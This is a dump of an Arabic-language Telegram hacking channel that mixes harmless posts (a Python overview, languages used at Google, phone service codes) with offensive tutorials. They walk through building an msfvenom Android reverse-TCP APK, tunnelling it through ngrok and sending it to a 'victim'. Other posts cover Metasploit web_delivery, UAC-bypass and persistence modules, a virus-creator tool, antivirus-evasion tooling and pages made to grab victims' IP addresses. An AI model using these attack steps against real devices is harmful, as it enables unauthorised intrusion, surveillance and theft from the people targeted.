افضل برامج وادوات
3.23K subscribers
30 photos
1 video
36 files
280 links
برامج مفيده للهكرز والمبرمجين وغيرهم
Download Telegram
لمحة عن لغة بايثون python

مميزات لغة بايثون بالنسبة للمطورين

لها شعبية هائلة و هناك الكثير من المراجع لمن يريد تعلمها.

بسيطة و تعلمها سهل جداً مقارنةً مع غيرها من اللغات.

إذا أنشأت برنامجاً باستخدام لغة بايثون فإن البرنامج يعمل على أي نظام في العالم و هذا من أهم ما يدفعك لتعلمها.

في وقتنا الحالي, تعتبر من أكثر اللغات طلباً في سوق العمل, أي إذا كنت تريد دخول سوق العمل فلغة بايثون توفر لك الكثير من الفرص.

إحدى أهم اللغات التي يستخدمها المهمتين بمجال أمن المعلومات و الهاكرز.


بايثون تعمل على جميع و أهم أنظمة التشغيل مثل Windows, Mac OS, Linux, Unix إلخ.. و تعتبر من أشهر لغات البرمجة على الإطلاق.

مميزات لغة بايثون عن باقي لغات البرمجة

مادياً
لن تدفع أي مبلغ لتعمل على لغة بايثون, فهي مصدر مفتوح و مجانية و ستبقى مجانية مدى الحياة.


تقنياً
تستطيع البرمجة بها حتى و لو كان حاسوبك ضعيفاً أو قديماً.


سهولة القراءة و التعديل 
تعلمها سهل جداً و يمكن قراءة و تعديل الكود المكتوب فيها بسهولة.


سرعة التنفيذ 
يستطيع نظام التشغيل فهم الكود المكتوب بلغة بايثون كما هو تنفيذه بشكل مباشر بدون الحاجة إلى وجود مترجم خاص ليفسر أوامر بايثون إلى أوامر يفهمها نظام التشغيل كما تطلب بعض لغات البرمجة الأخرى مثل لغة جافا.


العمل على أكثر من منصة 
البرنامج الذي تبنيه بواسطة لغة بايثون يعمل على كما على أهم أنظمة التشغيل مثل Windows, Mac OS, Linux, Unix.


كائينة التوجه 
تدعم مفهوم الكلاس/ الكائن/ التغليف, الوراثة إلخ..


تعدد المهام 
بايثون توفر لك تقنية الـ Multithreading و التي تسمح لك بجعل برنامجك قادراً على تنفيذ عدة أوامر مع بعض و بنفس الوقت.


قواعد البيانات 
بايثون توفر إنترفيسات جاهزة للتعامل مع أهم قواعد البيانات.


واجهة المستخدم 
يمكن بناء تطبيقات فيها واجهة مستخدم فيها.


التعامل مع لغات برمجة أخرى 
يمكنك التعامل مع لغات برمجة أخرى ( مثل C, C++, Java ) ضمن برنامجك المكتوب في الأساس بلغة بايثون


تعامل لغات البرمجة الأخرى مع لغة بايثون 
أغلب لغات البرمجة تدعم التعامل مع لغة بايثون أي أنهم يتيحون لك إستخدام كود مكتوب بلغة بايثون في برامج مكتوبة في الأساس بلغات برمجة أخرى ( مثل C, C++, Java )


المناهج التعليمية
العديد من المعاهد و الجامعات سواء كانت أجنبية أو عربية أصبحت تدرسها للطلاب.
افضل برامج وادوات pinned «موقع لمعرفة ip اي شخص من خلال ارسال رابط www.blasze.tk»
موقع يقوم بفحص الثغرات الأمنية للمواقع
فقط ضع رابط الموقع الذي تريد ان تفحصه وسيبدء الموقع بالفحص

رابط الموقع
http://sitecheck.sucuri.net
توزيعة wifislax لإختبار اختراق الواي فاي بجميع انواعه يوجد ايضا الكثير من ادوات اختبار الاختراق داخل التوزيعة (تعمل على الاندرويد)

رابط تثبيت التوزيعة من الموقع الرسمي
https://www.wifislax.com
-------------------------

توزيعة parrot المنافس الأول ل kaliLinux من ناحية اختبار الاختراق

للتحميل من الموقع الرسمي
https://www.parrotsec.org

تحميل توزيعة Anonymous Os (نظام ملغوم)

www.anonymous.org/

تحميل توزيعة Kali Linux

www.kali-linux.org/
👍1
-------------------------------------------------
أوامر بداية الترمكس
-------------------------------------------------
01- pkg update -y
02- pkg upgrade -y
03- pkg install python -y
04- pkg install python2 -y
05- pkg install python2-dev -y
06- pkg install python3 -y
07- pkg install java -y
08- pkg install fish -y
09- pkg install ruby -y
10- pkg install help -y
11- pkg install git -y
12- pkg install host -y
13- pkg install php -y
14- pkg install perl -y
15- pkg install nmap -y
16- pkg install bash -y
17- pkg install clang -y
18- pkg install nano -y
19- pkg install w3m -y
20- pkg install havij -y
21- pkg install hydra -y
22- pkg install figlet -y
23- pkg install cowsay -y
24- pkg install curl -y
25- pkg install tar -y
26- pkg install zip -y
27- pkg install unzip -y
28- pkg install tor -y
29- pkg install google -y
30- pkg install sudo -y
31- pkg install wget -y
32- pkg install wireshark -y
33- pkg install wgetrc -y
34- pkg install wcalc -y
35- pkg install bmon -y
36- pkg install vpn -y
37- pkg install unrar -y
38- pkg install toilet -y
39- pkg install proot -y
40- pkg install net-tools -y
41- pkg install golang -y
42- pkg install chroot -y
43- termux-chroot -y
44- pkg install macchanger -y
45- pkg install openssl -y
46- pkg install cmatrix -y
47- pkg install openssh -y
48- pkg install wireshark -y
49- termux-setup-storage -y
50- pkg install macchanger -y
51- apt update && apt upgrade -y
-------------------------------------------------
انسخ ولصق وضغط انتر ونتظر حـتـــ ؟؟! ـــى يخلص وبعد الامر التالي
👍3
السلام عليكم ورحمة الله
الشرح دة لناس الماقدرت #تثبت_النجروك(ngrok)

1- تسجل في الموقع بتاع النجروك www.ngrok.com
2- الخطوة الثانيه تحمل ملف التثبيت حق نجروك
بعد يحمل الملف نضعو في الذاكرة الداخليه للهاتف مع الملفات علشان نجي نستدعيهو لاحقاا
3- الخطوة الثالثه بفتح ال termux بكتب الخطوات دي

→ apt update && apt upgrade

→ cd /sdcard

→ ls

→ mv ngrok-stable-linux-arm.zip $HOME

→ cd

→ ls

→ unzip ngrok-stable-linux-arm.zip

→ rm -rif ngrok-stable-linux-arm.zip

→ ./ngrok authtoken authtokenyrifjgbhdjgnbvjgcbn_gfvhfhvcbgf
→ ls
الان رح نكتب امر تشغيل اداه نجروك بأمر↓

→ ./ngrok tcp 4444
👍1
بسم الله الرحمن الرحيم


شرحنا اليوم تثبيت اداة metasploit
في خطوات بسيطه

1- apt update && apt upgrade -y


2- pkg install git


3- gem install bundler


4- gem install bundle


5- pip install bundle

يلا هنا بعد تكتبو الاوامر 5 دي تجو تثبيتو اداة Tool-X ودي جو ليها أدوات كتيرة طبعا بتلاقي اداة ميتا جو ما بعرف رقم كم هي بس ثبتها من الأداة دي يلا بعد تثبتها

6- git clone https://github.com/Rajkumrdusad/Tool-X.git
نقوم ندخل على الأداة دي ونثبت ميتا

7- cd Tool-X


8- chmod +x install.aex


9- ./install.aex
يلا هنا كدا الأداة Tool-X اشتغلت معاك وبقولو ليك اختار الاداة عايزها بعد ما تختار ميتا بتتثبت معاك يلا اكتب الاوامر تحت دي


10- ./metasploit.sh
دي عشان تثبت الميتا بعد ما تنزلها

11- msfconsole
الأمر دا بفتح ليك ميتا
ما هي لغات البرمجة المستخدمة من قبل مبرمجي جوجل ؟



لنفترض أنك في يوم من الأيام تطمح للعمل في Google كمبرمج أو مطور برامج. ما هو السؤال الأول الذي سوف تسأله لنفسك؟ اكثر سؤال ستسأله هو ماهي لغات البرمجة التي تستخدمها Google داخليًا؟




من خلال معرفة الإجابة الصحيحة على هذا السؤال ، سوف تكون قادرًا على إعداد نفسك بشكل ملائم بحيث لا تشعر أنك في غير مكانك عندما تحصل على وظيفة في شركة التكنولوجيا العملاقة هذه.


طبعا هذه المعلومات تم جمعها من الأشخاص الذين يعملون في Google والمنتجات التي طورتها Google.والتي تكشف عن بعض المعلومات المتعلقة باللغات المستخدمة في Google داخليًا. فيما يلي بعض منها:


 1. C ++


أحد الأشياء التي تعطى الأولوية في Google هو الأداء. إنها لغة برمجة مثالية يمكن استخدامها للتعامل مع العديد من الخوادم . ويفضل أيضا C ++ لأنها محمولة . هذا يعني ببساطة أنه يمكن استخدامه على منصات وأجهزة مختلفة.


قد تكون تنوع استخدام C ++ سببًا آخر لاستخدامه في Google. ويمكن استخدامه لمجموعة واسعة من التطبيقات بما في ذلك الرسومات ثلاثية الأبعاد ، واجهة المستخدم الرسومية ، وتنفيذ عمليات حسابية معقدة  ...


2. بايثون


معظمنا يعرف بايثون . فهي لغة تتميز بالبساطة والمتانة والتنوع. من المحتمل أن هذه الميزات هي السبب في أنها من بين اللغات المفضلة التي تستخدمها Google داخليًا.


Python هي لغة رائعة للمبرمجين المبتدئين والمبتدئين في Google. يسمح لهم بتنفيذ عدد كبير من المهام التي تعتبر معقدة. وهي أيضًا لغة انتقال إلى أدوات البنية الأساسية. مرونة بيثون تجعلها الخيار الأمثل لمعالجة البيانات وإدارتها. يعطي امتيازات المبرمجين لإنشاء ملفات البيانات.  


يُعتقد أن محرك بحث Google مكتوب بـ Python. يتم استخدام نفس اللغة أيضًا لكتابة برامج تتبع الارتباطات والعناكب التي تستخدمها جوجل .


3. جافا


Java هي لغة برمجة راسخة موجودة منذ أكثر من 20 عامًا. ومن بين لغات البرمجة التي تستخدم بكثافة في جوجل. كما هو متوقع ، يمكن أن تكون تعددية استخدام Java أحد الأسباب التي تجعلها شائعة جدًا. يمكن استخدامه لبرمجة كل من الأجهزة وكذلك نظام التشغيل. على سبيل المثال ، يعتمد نظام التشغيل Android على جافا. Java أيضا فعالة جدا عندما يتعلق الأمر بتشغيل الخوادم.


عندما يتعلق الأمر بـ Google ، يتم استخدام Java بشكل أساسي للبرمجة وتطوير واجهة المستخدم. تتمتع جافا بدعم كامل من العديد من المكتبات.


3. جافا سكريبت


JavaScript هي لغة برمجة تستخدم في جعل مواقع الويب أكثر تفاعلية. يتم تصنيفها من بين أفضل اللغات المستخدمة في Google داخليًا. بالنظر إلى أن الشركة لديها العديد من المنتجات المستندة إلى الويب في السوق ، فإنه لا شك أن JavaScript هي إحدى اللغات التي يتم الاعتماد عليها.


خذ مثالاً على إعلانات Google. يتم تشغيلها بواسطة JavaScript. يتم استخدام اللغة أيضًا في الأجهزة المحمولة. لقد تم تحسين استخدام جافا سكريبت بواسطة Node.js وهي تقنية خادم قوية.


5. Golang 


Go ( Golang ) هي لغة برمجة مفتوحة المصدر ولدت مباشرة داخل Google. لهذا السبب ، فهي لغة شائعة الاستخدام داخل الشركة. تم تطوير اللغة لغرض تحسين إنتاجية البرامج في Google. وهذا يعني أن التنفيذيين في الشركة أرادوا مهندسيهم أن يفعلوا المزيد عند التطوير والبرمجة . لتحقيق ذلك ، يستخدم Golang الميزات القوية للغات الأخرى بينما يتجاهل في نفس الوقت نقاط ضعف تلك اللغات.


على سبيل المثال ، يستخدم Go مستوى ثابت وكفاءة C ++ بينما يأخذ في نفس الوقت إنتاجية وبساطة بايثون.


في الختام ، هذه هي من بين أعلى لغات البرمجة التي تستخدمها Google داخليًا. بصفتها شركة عملاقة في مجال التكنولوجيا ، تمنح Google مبرمجيها حرية استكشاف لغات البرمجة التي يحبونها. تلك التي ذكرتها هنا هي فقط من بين اللغات الاكثر شعبية. بخلاف ذلك ، هناك لغات أخرى يستخدمها المبرمجون في Google بلا شك.
👍3
اداة اكثر م̷ـــِْن 400اداة
DarkFly 400+ Tools

Installtion :

$ apt update

$ apt upgrade

$ apt install git

$ git clone https://github.com/Ranginang67/DarkFly-Tool

$ cd DarkFly-Tool

$ chmod +x *

$ sh install



$ DarkFly
👍1
هم الاكواد السرية الخاصة بالهواتف الذكية
اكواد سرية في هاتفك تقوم باشياء مهمة عليك معرفتها

3855#*2767* : يقوم بفرمتة هاتفك
#0228#* : معرفة المعلومات حول البطارية
#9900#*: إزالة الملفات المؤقتة
#0808#* : تغيير إعدادات usb
*#12580*369# : معرفة معلومات حول قطع الهاردوير
#1111#* : معرفة نوع إصدار service mode
#*#0* : مجموعة من اختبارات للهاتف
#2663#* : للتعرف على نسخة firmware وتحديثها
#34971539#* : للدخول إلى إعدادات الكاميرا
#0011#* : لمعرفة معلومات حولGSM

نوكيا NOKIA

تكتب في الشاشة الرئيسية
*#06# لفحص الرقم التسلسلي للجهاز IMEI (International Mobile Equipment Identity).

*#7780# استعادة ضبط المصنع.

*#67705646# مسح الشاشة.

*#0000# عرض إصدار البرنامج.

*#2820# عنوان جهاز البلوتوث.

*#746025625# حالة ساعة الشريحة SIM.

*#62209526# – عرض عنوان MAC لمحول الشبكة اللاسلكية WLAN. هذه الخاصية للأجهزة الحديثة التي تدعم شبكة لاسلكية مثل .N80

#pw+1234567890+1# عرض حالة القيود على الشريحة.

*#92702689# – عرض قائمة خفية (اختصار Warranty) بالمعلومات التالية
1. عرض الرقم التسلسلي.

عرض تاريخ الصنع بالشهر والسنة

عرض تاريخ الشراء إن وجد بالشهر والسنةMMYY

عرض تاريخ آخر عملية صيانة إن وجد (0000)

عرض العمر التشغيلي للهاتف

*#3370# – تفعيل (أو تعطيل) ترميز بيانات معزز EFR. يزيد من قوة الإشارة والاستلام على حساب البطارية

*#4720# – تفعيل أو تعطيل نصف معدل الترميز.
*#7370925538# عند نسيان كلمة مرور المحفظة في S60

سيتم حذف كافة بيانات المحفظة وسيطلب منك قبلاً كود القفل (الافتراضي 12345)

اضغط *#3925538# لحذف المحتويات وشفرة المحفظة.

*#7328748263373738# إعادة ضبط رمز الأمان (الافتراضي 12345). لأي جهاز نوكيا

لفك قفل مزود الخدمة: أدخل الشريحة، قم بتشغيل الجهاز واضغط سهم زيادة الصوت لثلاث ثواني، حتى يعطي رمز PIN. اضغط C، ثم اضغط * وحين تومض الرسالة، اضغط * مرة أخرى ثم 04PINPIN*PIN#

لتغيير مجموعة المتصل المغلقة (إعدادات – إعدادات الأمان – مجموعات المستخدم) إلى 00000 وسوف يصدر هاتفك نغمة الرسالة عندما تقترب من منطقة مراقبة السرعة بالرادار.

ٍعند ضبطه على 500 سوف يجعل هاتفك يوقف منبهات الأمان على مخارج المحلات. يعمل هذا المقلب مع بعض هواتف نوكيا.

اضغط 0 لبعض الوقت في الشاشة الرئيسية لفتح متصفح الواب.

سوني SONY

قائمة سوني الخفية: -> * <- <- * <- *

(-> معناها اضغط عصا الألعاب،, الأسهم إلى اليمين بينما <- تعني إلى اليسار.)

تعرض موديل الهاتف، معلومات البرنامج، الرقم التسلسلي IMEI، معلومات الإعدادات، حالة الشريحة، ساعة النظام، إجمالي وقت المكالمات وعناوين النص.

IMEI الرقم التسلسلي للجهاز: *#06#

حالة القفل: <- * * <-

اختصار إلى آخر المكالمات المطلوبة: 0#

اختصار لأرقام الشريحة: في القائمة الرئيسية اكتب رقماً ثم اضغط رمز المربع #

اختصار استعادة اللغة: اضغط اليسار < ثم 0000 ثم اليمين >

جالاكسي Galaxy

##4636## عن البطارية وإعدادات أخرى مثل GSM/CDMA

##8255## خدمة عرض Gtalk

##7780## استعادة إعدادات المصنع

##34971539## لعرض معلومات عن كاميرا الهاتف (توخى الحذر عند التنقل بين الخيارات)

##7594## تغيير مهمة زر القدرة Power.

##197328640## نظام الخدمة

*#197238640# نظام الخدمة

#0# نظام الفحص

*#06# عرض رقم IMEI

*#1234# عرض برنامج firmware الحالي للهاتف

##1472365## فحص GPS

*#0011# القائمة الخفية لنظام الشبكة

##0##* قائمة فحص الشاشة

*#7465625# نظام هندسي

*#3214789650# خدمة GPS

*#9900# نسخ بعض بيانات الذاكرة وسجلات أخرى لوسائط خارجية مثل بطاقة SD

27673855# مسح بيانات المصنع وإعادة ضبط البطاقة بعد التأكيد بالضغط على # استعمل هذا فقط عند الرغبة بمسح البيانات

##273283255663282##* نسخ احتياطي للوسائط

أكواد مصنعية جديدة

*#1234# (عرض إصدار SW PDA, CSC, MODEM)

#12580369# (معلومات SW & HW)

*#197328640# (نظام الخدمة)

*#0228# (قراءة ADC)

*#32489# (معلومات تشفير Ciphering)

*#232337#( عنوان بلوتوث Bluetooth Address)

*#232331# (نظام فحص البلوتوث)

*#232338# (عنوان كرت الشبكة اللاسلكية WLAN MAC Address)

*#232339# (نظام فحص WLAN)

*#0842# (نظام فحص الهزاز)

*#0782# (فحص الساعة للزمن الحقيقي)

*#0673# (نظام فحص الصوت)

#0# (نظام فحص عام)

*#2263# (اختيار نطاق RF)

*#9090# (إعدادات فحص)

*#7284# (نظام فحص التحكم USB I2C)

*#872564# (نظام التحكم USB)

*#4238378# (إعداد GCF)

*#0283# (التحم الراجع بالصوت)

*#1575# (قائمة GPS)

*#3214789650# (نظام فحص LBS)

*#745# (قائمة RIL Dump)

*#746# (قائمة Debug Dump)

*#9900# (نظام System Dump)

*#44336# (معلومات إصدار النظام)

*#7780# (وضع المصنع)

27673855# (وضع المصنع الشامل)

*#0289# (نظام فحص Melody)
👍2😁1
*#2663# (تحديث برنامج TSP / TSK)

*#03# (NAND Flash S/N)

*#0589# (نظام فحص مستشعر الضوء)

*#0588# (Proximity Sensor Test Mode)

#2732832553282# (Data Create Menu)

#273283255663282# (Data Create SD Card)

#3282727336*# (Data Usage Status)

*#7594# (Remap Shutdown to End Call TSK)

*#34971539# (Camera Firmware Update)

*#526# (WLAN Engineering Mode)

*#528# (WLAN Engineering Mode)

*#7412365# (Camera Firmware Menu)

*#07# (تاريخ الفحص)

*#3214789# (نظام فحص GCF)

*#272886# (اختيار الرد الآلي)

*#8736364# (قائمة تحديث OTA)

*#301279# (HSDPA/HSUPA Control Menu)

*#7353# (Quick Test Menu)

27674387264636# (Sellout SMS / PCODE view)

*#7465625# (View Phone Lock Status)

7465625638*# (Configure Network Lock MCC/MNC)

#7465625638# (Insert Network Lock Keycode)

7465625782*# (Configure Network Lock NSP)

#7465625782# (Insert Partitial Network Lock Keycode)

746562577*# (Insert Network Lock Keycode SP)

#746562577# (Insert Operator Lock Keycode)

746562527*# (Insert Network Lock Keycode NSP/CP)

#746562527# (Insert Provider Keycode)

#272imei#* شفرة المنتج ، يعمل على Froyo

اتش تي سي HTC

في الشاشة الرئيسية (بعض الهواتف تستبد المربع الأخير # برمز الاتصال، كما أن الأرقام الموجودة هنا تحمل غالباً حروف المصطلحات فمثلاً 778 هي نفسها PST لأن رمز P موجود مع الرقم 7 وS كذلك مع 7 وT مع 8)

##775# – اعدادات EPST/PRL – PRL

##786# – EPST – حالة القائمة

##3282# – EPST – قائمة برمجة البيانات (اسم المستخدم, متقدم, إستعادة, تمكين HFA, خادم DSA , وصلة MMSC)

##33284# – Debug – قائمة الفحص – (Debug Screen شاشة الفحص , Test Calls فحص المكالمات, RC Data بيانات , الصوت اختيار HDR/1X , خصوصية الصوتVoice Privacy, نغمات المفاتيح DTMF Set, نظام كوريا Korea Mode Set)

##3424# – Diagnostic الفحص – الاتصال مع الهاتف في بيئة الفحص

##2539# – EPST/A-Key – قائمة بيانات

##7738# – EPST/P_Rev – إصدار البروتوكول

##8626337# – EPST/Vocoder – نظام الترميز المعزز

##4772579# – إعادة ضبط خدمة الجي بي اس GPS

##72786# – استعادة DSA إلى وضع المصنع

##889# – تمكين TTY

##4636## – معلومات الهاتف

##UPST# – دليل المودم

##778# – EPST – برمجة متقدمة

##37872# – Full Speed USB Mode تمكين\تعطيل نظام السرعة القصوى للبيانات

##3386# – DDTM – تمكين\تعطيل

#0# – أداة فحص آمن

*#0011# قائمة الخدمة

*#0228# حالة البطارية

*#0283# حلقة مغلقة لحزمة بيانات المستقبل

*#0289# إعادة فحص ميلودي

*#0673# فحص ميلودي

*#0782# RTCTimeRead عرض الوقت (مع الثواني)

*#0842# فحص الهزاز

*#147852# الوصول إلى قوائم عديدة منها اتصالات CDMA DATA

*#1472365# GPS إعدادات

*#1575# قائمة خدمة

*#197328640# قائمة خدمة

*#232331# فحص بث البلوتوث

*#2454# تعطيل تنبيه ضعف البطارية

*#2580# قائمة خدمة

*#2663# فحص دقة شاشة اللمس

*#2664# إصدار برنامج شاشة اللمس

*#2664# تحديث البرنامج الرئيسي Firmware

#27672878# قائمة خدمة

*#32489# قائمة خدمة

*#3264# RAM إصدار الرام

#3282727336*# حالة التاريخ الحالي

*#369852# الوصول إلى قوائم عديدة منها اتصالات CDMA DATA

*#4238378# قائمة خدمة

#6984125# قائمة خدمة

*#7284# قائمة خدمة

*#745# Sec_RIL_Dump النسخ إلى ذاكرة الهاتف, مسح سجل ril , (نسخ SDcard وعرض سجل RIL), الخروج

*#7450# Phone Dump Mode تعطيل

*#7451# Phone Dump Mode تمكين

#7673855# تهيئة المصنع

*#7780# ضبط المصنع

*#9090# قائمة خدمة

*#9900# SysDump نسخ كاتالوج السجل/حالة التخزين المؤقت/dumpsys,تمكين سجل الفحص, نسخ سجل حالة فحص مراقبة التخزين المؤقت)
2👍1
رموز وأسرار أجهزة إل جي LG

بسم الله نبدأ ...

 قائمة الاختبار في أجهزة LG 

2945 ثم # ثم * ثم #

----------------------------------

اﻟـﮧۣۚجـﮧۣۜـوہۗكـﮧـۖرۧۛ اﻟﮧۣۚـعـﮧۣۜـمـہۗرانـﮧـۖيۧۛ 

 القائمةالخفية في أجهزة LG 

2945 ثم * ثم # ثم 0 ثم 1 ثم * ثم #

----------------------------------

 الرقم التسلسلي 

* ثم # ثم 0 ثم 6 ثم #

----------------------------------

 الرقم التسلسلي و السوفت وير لبعض الاجهزة 

* ثم # ثم 0 ثم 7 ثم #

----------------------------------

 اصدار السوفت وير  

* ثم 8 ثم 3 ثم 7 ثم 5

----------------------------------

 التحقق من cheksum  

* ثم 6 ثم 8 ثم 6 ثم 1

----------------------------------

 اختبار المصنع 

# ثم P ثم W ثم R ثم 6 ثم 6 ثم 8

----------------------------------

اﻟـﮧۣۚجـﮧۣۜـوہۗكـﮧـۖرۧۛ اﻟﮧۣۚـعـﮧۣۜـمـہۗرانـﮧـۖيۧۛ  🇾🇪

 قائمة Simlock (LG B1200)  

1 ثم 9 ثم 4 ثم 5 ثم # ثم * ثم 5 ثم 1 ثم 0 ثم 1

----------------------------------

 قائمة Simlock (LG 510W, 5200)  

2 ثم 9 ثم 4 ثم 5 ثم # ثم *ثم 5 ثم 1 ثم 0 ثم 1 ثم #

----------------------------------

 قائمة Simlock (LG 7020, 7010)  

2 ثم 9 ثم 4 ثم 5 ثم # ثم * ثم 7 ثم 0 ثم 0 ثم 0 ثم 1 ثم #

----------------------------------

 قائمة Sinlock (LG 500, 600) 

2 ثم 9 ثم 4 ثم 7 ثم # ثم *

----------------------------------

 سلسلة الأجهزة U81xx لمعرفة إصدار الجهاز بدون وجود بطاقة سيم SIM اختر SW Ver.info  

277634 ثم # ثم * ثم #

أو

 47328545454 ثم #

----------------------------------

 سلسلة الأجهزة U81xx لإجراء ضبط إعدادات المصنع بدون وجود بطاقة سيم SIM اختر Factory Reset  

277634 ثم # ثم * ثم #


أو

 47328545454 ثم #



      


اتمنى ان يكون قد نال اعجابكم و رضاكم

استودعكم الله

الى موضوع قادم ان شاء الله ..؛

👍3
طريقة تثبيت الميتاسبلويت في الترمكس (Termux) بعد تحديث الاخير للموقع الرسمي الخاص بها اصبحت تثبت تثبيتا مباشرا بأمرين فقط افتح تطبيق الترمكس اكتب سطر الاوامر حسب الترتيب


1_$ apt update && apt upgrade -y
انتضر تحديث الحزم

2_$ pkg install unstable-repo


3_$ pkg install metasploit

بعد كتابة امر التبيت الميتاسبلويت Metasploit
ستنتظر قليلا حسب سرعة الانترنت لديك

لتشغيل الميتاسبلويت نستعمل الامر

msfconsole
السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater


 طريقه تثبيتها:::-


الاوامر

1-  git clone https://github.com/ERROR4317/viruscreater

2-  cd viruscreater

أمر التشغيل


3- python2 virus.py



انا اخترت رقم 2

صناعه فيروسات قويه و ب انواع مختلفه



#CS
 
👍1
السلام عليكم ورحمة الله
سوف اقدم لكم طريقه اختراق الاندرويد عبر اداتي
الميتا و النجروك


اول خطوة هي فتح النجروك  ملحوظه قمت بفتح بورت 4444
ls

./ngrok tcp 4444



ثاني خطوة نفتح صفحه جديدة ونكتب هذي الأوامر بالترتيب



ls


cd metasploit-framework

./msfvenom -p android/meterpreter/reverse_tcp LPORT=4444 LHOST=الاي بي  R> /sdcard/SAJA.apk


(ملحوظه مهمه ممكن نستخدم  ال LHOST و LPORT  التعطيك ياها  النجروك )

الخطوة التاليه هي فتح الميتا بنفس الصفحه عن طريق الأمر
./msfconsole
بعد تفتح الأداة اكتب الأوامر بالترتيب


use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set lport 4444

set lhost الاي بي

exploit

بعدها نروح  الى ذاكرة الجهاز الداخليه نجد ملف اسمه

SAJA.apk

نقوم بارساله الي الضحيه و ننتظر  حتي يقوم الضحيه بتثبيته


بعدها راح يفتح لنا جلسه اختراق
ونقوم بكتابه أوامر التحكم لمعرفتها نكتب
help , -h , ?


#CS
‏اداة لتخطي مكافحات الفيروسات
الاداة قادرة على إنشاء FUD(او بالمعنى العربي كلين)
قابل للتنفيذ حتى مع اشهر بايلودات الميتاسبلويت

$ get clone https://github.com/oddcod3/Phantom-Evasion
$ sudo chmod +x phantom-evasion.py
$ sudo ./phantom-evasion.py
السلام عليكم ورحمة الله
شرحي اليوم مميز شوي هو عن أداة PhoneInfoga
و ظيفتها جلب معلومات عن رقم معين ....


أوامر تثبيتها


 
git clone https://github.com/sundowndev/PhoneInfoga

cd PhoneInfoga

python3 -m pip install -r requirements.txt


أوامر تشغيلها

python  phoneinfoga.py -n  2490000000000

بعد كتابه هذا الأمر يطلع لك الأوامر الأساسية للرقم





سأترك لكم بقيه الأوامر لاكتشافها
 
optional arguments:
  -h, --help            show this help message and exit
  -n number, --number number
                        The phone number to scan (E164 or international
                        format)
  -i input_file, --input input_file
                        Phone number list to scan (one per line)
  -o output_file, --output output_file
                        Output to save scan results
  -s scanner, --scanner scanner
                        The scanner to use
  --osint               Use OSINT reconnaissance
  -u, --update          Update the project
  --no-ansi             Disable colored output
  -v, --version         Show tool version






#CS
👍1
السلام عليكم ورحمة الله وبركاته
شرح اليوم عن جلب ip الضحيه عبر طرق مختلفه
هنالك أكثر من 5 طرق لجلب ip الضحيه سوف اشرح لكم طريقتين منهما

الطريقه الاولي عن طريق أداة T-HOST
 و الثانيه عن طريق أداة تصنعها بنفسك و هذي اضمن من أداة T-HOST


بسم الله نبدا


الطريقه الاولي   أداة T-HOST

أوامر تثبيتها


apt install git

git clone https://github.com/Bhai4You/T-Host

cd T-Host

chmod +x requirement.sh 127.0.0.1.sh

 bash requirement.sh
أوامر تشغيل الأداة



bash 127.0.0.1.sh


و بعدها راح يطلب منك اسم للصورة مثلا راح يكون

Cs.jpg

و بعدها راح يقول لك اعطي اسم للصفحة تبعك اختار اي اسم تريد
Cs

و بعدها راح يطلب حجم و عرض للصورة اختر الحجم المناسب لك


و بعدها راح تدخل ip تبعك و البورت المناسب انا اخترت 4444

و بعدها اضغط انتر و استني راح يطلع لكم رابط مثل هذا https://pactus.serveo.net
تقم بارساله للضحيه  من غير إغلاق أداة T-HOST

 بعد ما الضحيه يدخل عليه يتم جلب ip تبعه


 

#CS
👍1
السلام عليكم ورحمة الله وبركاته

الطريقه الثانيه ..
بسم الله نبدأ. ...

اولا راح نثبت الأمر php
pkg install php
اول خطوة راح نشي ملف داخل الهوم تبع termux ب اسم CS


mkdir CS
بعدها لو كتبت ls
راح يظهر لك ملف ب اسم CS مع الأدوات تبعك


ثانيا ....
راح ننشي ملف index بداخل ملف CS
اولا راح ندخل ملف CS عبر الأمر
cd CS
بعدها
nano index.html
راح يفتح لنا صفحه راح نكتب بداخلها وسم html


<html>
<head>
<title>مرحبا بكم في مجر الظلام </title>
</head>
<body bgcolor='blue'>
<center>
<img src='mama.jpg' width='100' height='100' />

</center>
<font color=red size='10px' face='tahoma'>
<h1> <p align='center'> <b>you are hacked by saja <br> </h1>
<font color=white size='10px' face='tahoma'>
<h3> <p align=center> مرحبا بكم في مجر الظلام </h3>
<h3>معكم <p align=center> CS<b> </h3>
</body>
</html>
بعدها نعمل حفظ



الحين راح نجلب الصورة تبعنا من ال  sdcard
اولا راح نضع الصورة مع الملفات mama.jpg

ونكتب
cd /sdcard
و بعدها
cp mama.jpg/$HOME/CS

كدا بقي عندنا صورة وملف html


كدا انا أنشأت index حقي

ح انقل أو نسخ  ملف CS كلو الي الذاكرة

mv CS /sdcard


لو فتحت الذاكرة الداخليه ح تلقي الملف اتنقل وبداخله
صورة و ملف html

نرجع termux

php -S  127.0.0.1:2340 -t /sdcard/CS
بظهر ليك رابط نسخ و أرسله للضحية







#CS
👍1
استغلال بعض ثغرات MetaSploit 💻

____________________________________________

أختراق Windows عن طريق Power Shell باستغلال ثغرة web_delivery

+) ماهو Power Shell ؟
هو عبارة عن أمر او مجموعة من الأوامر التنفيذية التي تكتب في cmd او ما يسمى موجه الأوامر " أمتداده يكون bat ويمكن تحويله إلى ملف بأمتداد exe "

+) أوامر الأستغلال ~>

$ msfstart
$ msfconsole
$ use exploit/multi/script/web_delivery
$ show targets
$ set target <Numper Target>
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ show option
$ exploit
$ session -i
$ session -i <Numper Session>

____________________________________________

تخطي UAC باستغلال ثغرة ASK

+) ماهو UAC ؟
هو عبارة عن صلاحيات الأدمن داخل جهاز الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/ask
$ set LHOST <ip>
$ set LPORT <port>
$ set session <numper session target>
$ set TECHNIQUE < PSH / EXE >
$ exploit
$ getsystem
$ run post/windows/gather/win_prives

____________________________________________

استغلال ثغرة s4u لتثبيت الضحية و حقن البايلود في جميع يوزر الضحية

+) أوامر الأستغلال ~>

$ use exploit/windows/local/s4u_persistence
$ set session <numper session target>
$ set TRIGGER <even,lock,logon,schedule,unlock>
$ set LPORT <port>
$ exploit

____________________________________________

اختراق الأجهزة بإستخدام سكربت بلغة الباثيون


+) صنع السكربت الملغم ~>

$ msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.py


+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit

_____________________________________________

اختراق الاندرويد عن طريق بايلود apk ملغم

